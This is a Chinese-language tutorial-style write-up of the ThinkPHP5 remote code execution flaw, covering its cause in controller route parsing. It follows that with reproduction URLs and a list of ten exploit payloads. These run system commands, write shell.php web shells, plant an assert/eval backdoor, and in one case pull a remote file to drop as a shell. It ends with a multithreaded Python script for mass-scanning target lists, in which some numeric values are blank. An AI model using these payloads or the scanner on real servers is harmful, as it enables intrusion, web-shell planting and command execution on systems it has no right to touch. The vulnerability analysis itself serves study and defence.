22.ThinkPHP5框架缺陷导致远程命令执行

前言：

昨天爆出了ThinkPHP5框架缺陷导致远程命令执行，大佬们都赶上潮流挖洞，小白还是默默学习一下这个漏洞

漏洞影响范围：

Thinkphp 5.1.0 - 5.1.31
Thinkphp 5.0.5 - 5.0.23

漏洞产生原因：

Thinkphp5.x版本(5.0.20)中没有对路由中的控制器进行严格过滤，在存在 admin，index 模块、没有开启强制路由的条件下（默认不开启），导致可以注入恶意代码利用反射类调用命名空间其他任意内置类，完成远程代码执行。

漏洞分析：

既然是没有正确处理控制器名 $controller ，从最开始获取控制器名的代码来看：

发现在 $controller 中有过滤字符串中的 HTML 标签的strip_tags()函数，网站没有开启强制路由，问题可能出现在路由调度时，来看执行路由调度的代码：

其中使用了 $this->app->controller 的方法来实例化控制器，然后调用实例化中的方法，跟进controller方法：

其中通过 parseModuleAndClass 方法解析出 $module，$class。然后实例化 $class。

着重看一下 parseModuleAndClass 方法：

发现 $name 如果以反斜线\开始时，直接进入第一个if判断，将 $name 直接作为类名，如果可以控制 $name (即路由中的controller部分)，那么就可以实例化任何一个类。

回看路由解析代码，其中的 parseUrl 方法调用了 parseUrlPath 方法来解析 $url ，也就是 pathinfo 中的路由信息

来看 parseUrlPath 如何解析 $url :

使用/对 $url 进行分割，未进行任何过滤，其中路由url从path()中获取。

这里 Config::get('var_pathinfo') 是配置文件中的设置的参数，'var_pathinfo' 的默认配置为s，我们可以利用
$_GET['s']来传递路由信息，也可以利用pathinfo来传递，但测试时windows环境会将$_SERVER['pathinfo']中的\
替换为/。结合前面分析可得初步利用代码如下：index.php?s=index/\namespace\class/method，
这将会实例化\namespace\class并执行method方法。

漏洞复现：

1. 代码执行

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[]=

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[]=system&vars[][]=whoami

2.任意文件写入

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[]=file_put_contents&vars[][]=shell.php&vars[][]=加你要写入的文件内容url编码

把一句话 <?php phpinfo()?> 进行url编码：%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3f%3e

写入文件：

尝试访问shell.php：

写入成功！

放出一些payload:

1. /index.php?s=index/\think\Request/input&filter=phpinfo&data=1
2. /index.php?s=index/\think\Request/input&filter=system&data=id
3. /index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
4. /index.php?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
5. /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
6. /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7. /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
8. /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
9. /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET['joker']);&joker=system("whoami");
10. /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=print_r(file_put_contents(%27xx.php%27,file_get_contents(%27https://www.baidu.com/x.txt%27)))
(先file_get_contents读取远程文件内容为一句话 然后file_put_contents在当前目录下写入文件  而且不带<>)

给出tdcoming大佬批量检测脚本：

#!/usr/bin/env python
# -*- coding: utf- -*-
'''
name: thinkphp远程代码检测
description: ThinkPHP5 5.0./5.1. 远程代码执行漏洞
'''

import re
import sys
import requests
import queue
import threading
from bs4 import BeautifulSoup
class thinkphp_rce(threading.Thread):
    def __init__(self, q):
        threading.Thread.__init__(self)
        self.q = q
    def run(self):
        while not self.q.empty():
            url=self.q.get()
            headers = {"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"}
            payload = r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
            vulnurl = url + payload
            try:
                response = requests.get(vulnurl, headers=headers, timeout=, verify=False, allow_redirects=False)

                soup = BeautifulSoup(response.text,"lxml")
                if 'PHP Version' in str(soup.text):
                    print ('[+] Remote code execution vulnerability exists at the target address')
                    print ('[+] Vulnerability url address ' + vulnurl)
                    with open('target.txt','a') as f1:
                        f1.write(vulnurl+'\n')
                    f1.close()
                else:
                    print ('[-] There is no remote code execution vulnerability in the target address')
            except:
                print ('[!] Destination address cannot be connected')
def urlget():
    with open('url.txt','r')as f:
        urls=f.readlines()
        for tmp in urls:
            if '//' in tmp:
                url=tmp.strip('\n')
                urlList.append(url)
            else:
                url='http://'+tmp.strip('\n')
                urlList.append(url)
        return(urlList)
    f.close()

if __name__=="__main__":
    print('''----------------扫描开始-------------------

*Made by  :tdcoming
*For More :https://t.zsxq.com/Ai2rj6E
*MY Heart :https://t.zsxq.com/A2FQFMN

              _______   _                         _
             |__   __| | |                       (_)
                | |  __| |  ___  ___   _ __ ___   _  _ __    __ _
                | | / _` | / __|/ _ \ | '_ ` _ \ | || '_ \  / _` |
                | || (_| || (__| (_) || | | | | || || | | || (_| |
                |_| \__,_| \___|\___/ |_| |_| |_||_||_| |_| \__, |
                                                             __/ |
                                                            |___/
            ''')
    urlList=[]
    urlget()
    threads = []
    threads_count =
    q=queue.Queue()
    for url in urlList:
        q.put(url)
    for i in range(threads_count):
        threads.append(thinkphp_rce(q))
    for i in threads:
        i.start()
    for i in threads:
        i.join()

1、将要检测的目标放在url.txt里面
2、如果存在漏洞的地址将自动生成一个target.txt文本保存

aaarticlea/png;base64,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